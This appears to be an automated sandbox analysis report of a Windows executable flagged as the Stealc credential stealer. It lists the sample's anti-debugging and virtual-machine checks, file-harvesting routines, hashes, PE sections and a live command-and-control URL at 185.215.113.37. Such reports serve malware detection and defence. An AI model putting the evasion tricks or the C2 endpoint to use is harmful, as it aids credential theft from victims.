                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50503A0 second address: 50503A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50503BE second address: 5050493 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F98219BDB75h 0x00000008 and si, EEA6h 0x0000000d jmp 00007F98219BDB71h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 pushfd 0x00000017 jmp 00007F98219BDB77h 0x0000001c add eax, 22DEC1DEh 0x00000022 jmp 00007F98219BDB79h 0x00000027 popfd 0x00000028 pop eax 0x00000029 popad 0x0000002a push ebx 0x0000002b pushad 0x0000002c mov dx, si 0x0000002f mov ax, 4EB5h 0x00000033 popad 0x00000034 mov dword ptr [esp], ebp 0x00000037 jmp 00007F98219BDB70h 0x0000003c mov ebp, esp 0x0000003e jmp 00007F98219BDB70h 0x00000043 pop ebp 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 mov si, di 0x0000004a pushfd 0x0000004b jmp 00007F98219BDB79h 0x00000050 xor eax, 2CF6F2D6h 0x00000056 jmp 00007F98219BDB71h 0x0000005b popfd 0x0000005c popad 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050493 second address: 50504A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9820CD6B9Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F83A4 second address: 8F83A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 751A03 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 8ED659 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 751A30 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005038B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_005038B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00504910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00504910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_004FDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_004FE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00504570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00504570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_004FED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_004FBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004FDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004F16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FF68A FindFirstFileA,0_2_004FF68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00503EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00503EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004FF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F1160 GetSystemInfo,ExitProcess,0_2_004F1160
                Source: file.exe, file.exe, 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2144242993.00000000012BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2144242993.0000000001336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.2144242993.0000000001302000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13406
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13403
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13423
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13418
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13458
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F45C0 VirtualProtect ?,00000004,00000100,000000000_2_004F45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00509860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00509860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00509750 mov eax, dword ptr fs:[00000030h]0_2_00509750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00507850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00507850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5084, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00509600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00509600
                Source: file.exe, file.exe, 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00507B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00506920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00506920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00507850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00507850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00507A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00507A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.4f0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2144242993.00000000012BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2090253153.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5084, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.4f0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2144242993.00000000012BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2090253153.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5084, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.phpNfile.exe, 00000000.00000002.2144242993.0000000001317000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.phpmfile.exe, 00000000.00000002.2144242993.0000000001336000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.phprfile.exe, 00000000.00000002.2144242993.0000000001317000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/curity=Impersonationfile.exe, 00000000.00000002.2144242993.0000000001302000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37/e2b1563c6670f193.phpafile.exe, 00000000.00000002.2144242993.0000000001336000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://185.215.113.37file.exe, 00000000.00000002.2144242993.00000000012BE000.00000004.00000020.00020000.00000000.sdmptrue
                          • URL Reputation: malware
                          		unknown
                          http://185.215.113.37/e2b1563c6670f193.phpffile.exe, 00000000.00000002.2144242993.0000000001317000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown
                            http://185.215.113.37$file.exe, 00000000.00000002.2144242993.00000000012BE000.00000004.00000020.00020000.00000000.sdmptrue
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              185.215.113.37
                              		unknownPortugal
                              		206894WHOLESALECONNECTIONSNLtrue

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1538072
                              Start date and time:2024-10-20 09:39:07 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 2m 55s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:2
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@1/0@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 80%
                              • Number of executed functions: 19
                              • Number of non-executed functions: 85
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Stop behavior analysis, all processes terminated

                              Warnings

                              • Exclude process from analysis (whitelisted): dllhost.exe

                              Simulations

                              Behavior and APIs

                              No simulations

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              S3AYU5t2JP.exeGet hashmaliciousLummaC, Amadey, StealcBrowse
                              • 185.215.113.37/
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php

                              Domains

                              No context

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37
                              S3AYU5t2JP.exeGet hashmaliciousLummaC, Amadey, StealcBrowse
                              • 185.215.113.103
                              EY5iB1Y7CH.exeGet hashmaliciousAmadeyBrowse
                              • 185.215.113.43
                              xvus4NLqiQ.exeGet hashmaliciousAmadeyBrowse
                              • 185.215.113.43
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              No created / dropped files found

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.94820418679776
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:file.exe
                              File size:1'851'392 bytes
                              MD5:e6bd9e89d78f9970ffe0edaba03dc207
                              SHA1:d796439cf7a49abf6a7e19808f6e9da46c40e461
                              SHA256:20fe22c7cf9c1c920267161320319a6d7b31354826d68c6bca2b188633cfc181
                              SHA512:b57854fb947884929e5443cd40b3966ec8b0b96f2e7402b7521a5df1a1c3da120c1025125c5b98ec46ef96b8ba08135c47b6334de84e68bd50c2a00077c0b603
                              SSDEEP:24576:IOEyZme3uVffPRnJw/FfqOfwvj2dxREw9y4kDmCzZ01ZkqKvuI5DeHE7rSD+1nxG:IOie+pX3wb+j2df0zK1Zd7B6rS0Oh8U
                              TLSH:AF8533512EF52257C429663B1F18B3A86BDD006C4DDE8F9A2CF0F9BA895F670F711806
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                              File Icon

                              Icon Hash:00928e8e8686b000

                              Static PE Info

                              General

                              Entrypoint:0xa9e000
                              Entrypoint Section:.taggant
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:2eabe9054cad5152567f0699947a2c5b

                              Entrypoint Preview

                              Instruction
                              jmp 00007F98218FF28Ah
                              hint_nop dword ptr [eax+eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              jmp 00007F9821901285h
                              add byte ptr [edi], al
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], dh
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax+00000000h], al
                              add byte ptr [eax], al
                              add byte ptr [edx], ah
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [ecx+00000080h], dh
                              add byte ptr [eax], al
                              add byte ptr [eax], dh
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax+eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al

                              Rich Headers

                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              0x10000x25b0000x22800d697e3a312ca8cc739d73bad6030cb10unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              0x25e0000x2a10000x200f5e4ef0c0ed8e264f3b74d16c2897019unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              bzasfecw0x4ff0000x19e0000x19de0010dee14a30ae7ce73d08651446464028False0.9950260495318635data7.953590120742498IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              cqfnmftx0x69d0000x10000x4003a10babfb4e77f0970314df4940eabd5False0.7685546875data6.109023091192403IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .taggant0x69e0000x30000x220086d67401f9ea026f23f805c97ed198e8False0.06755514705882353DOS executable (COM)0.7306808909193588IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                              Imports

                              DLLImport
                              kernel32.dlllstrcpy

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
